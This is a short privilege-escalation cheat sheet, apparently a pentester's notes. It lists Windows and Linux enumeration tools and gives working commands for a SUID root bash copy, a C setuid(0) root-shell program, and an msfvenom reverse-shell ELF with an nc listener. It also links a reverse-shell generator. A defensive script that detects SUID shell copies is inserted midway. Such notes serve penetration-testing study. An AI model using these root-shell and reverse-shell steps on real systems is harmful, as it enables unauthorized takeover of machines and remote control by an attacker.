Privilege Escalation
Windows
./winPEASany.exe quiet servicesinfo
./SharpUp.exe
Linux
linEnum.sh --> https://github.com/rebootuser/LinEnum
lse.sh --> https://github.com/diego-treitos/linux-smart-enumeration
Before running, set the terminal's scrollback history to 5000 lines,
then execute LinEnum and review its output carefully.
Spawning Root Shell
rootbash -> a copy of bash with the SUID bit set
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
Spawn the root shell (-p stops bash from dropping the effective UID):
/tmp/rootbash -p
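From the defender's side, the SUID shell copy above can be hunted for by content rather than by name: any setuid/setgid file whose bytes match an installed shell is suspect. The script below is an added example, not part of the original notes; the function names (`shell_list`, `find_suid_shell_copies`, `make_sample`) are hypothetical and the sample files are constructed in a temporary directory.

```shell
#!/bin/sh
# Added example (not from the original notes): flag setuid/setgid files whose
# contents are byte-identical to an installed shell, e.g. /tmp/rootbash.

# Real paths of installed shells: /etc/shells plus common defaults.
# Assumes shell paths contain no whitespace.
shell_list() {
    { grep -v '^#' /etc/shells 2>/dev/null || true
      printf '%s\n' /bin/sh /bin/bash /bin/dash; } |
    while IFS= read -r s; do
        if [ -f "$s" ]; then readlink -f "$s"; fi
    done | sort -u
}

# Usage: find_suid_shell_copies DIR...
# Prints "<ls -ld line> == <matching shell>" for each hit.
find_suid_shell_copies() {
    shells=$(shell_list)
    find "$@" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r f; do
        for s in $shells; do
            if cmp -s "$f" "$s"; then
                printf '%s == %s\n' "$(ls -ld "$f")" "$s"
                break
            fi
        done
    done
}

# Constructed sample: a SUID shell copy, a plain copy, an unrelated SUID file.
make_sample() {
    d=$(mktemp -d)
    cp /bin/sh "$d/rootbash" && chmod u+s "$d/rootbash"
    cp /bin/sh "$d/plaincopy"
    printf 'not a shell\n' > "$d/other" && chmod u+s "$d/other"
    printf '%s\n' "$d"
}

case "${1:-}" in
    "")     ;;                                   # no arguments: define functions only
    --demo) sample=$(make_sample)
            find_suid_shell_copies "$sample"     # expect one line, for rootbash
            rm -rf "$sample" ;;
    *)      find_suid_shell_copies "$@" ;;       # e.g. /tmp /var/tmp /dev/shm /home
esac
```

Because the comparison is on file content, renaming the copy does not hide it; a root-owned hit in a world-writable directory deserves immediate triage.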
Custom Executable
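If a process running as root executes another program that you control (one you can modify or replace with your own binary), this can be used as that program:
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid() */
int main() {
    setuid(0);               /* take UID 0; only succeeds when run with root privileges */
    system("/bin/bash -p");  /* -p: bash keeps the effective UID */
    return 0;
}
Compile using: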
gcc -o <name> <file.c>
msfvenom (reverse shell)
Generate an ELF file using msfvenom:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell.elf
Listen on the attacking machine:
nc -lvnp <port>
Native Reverse Shells
Use this tool to generate a reverse shell in any language:
https://github.com/mthbernardes/rsg
Will be updated soon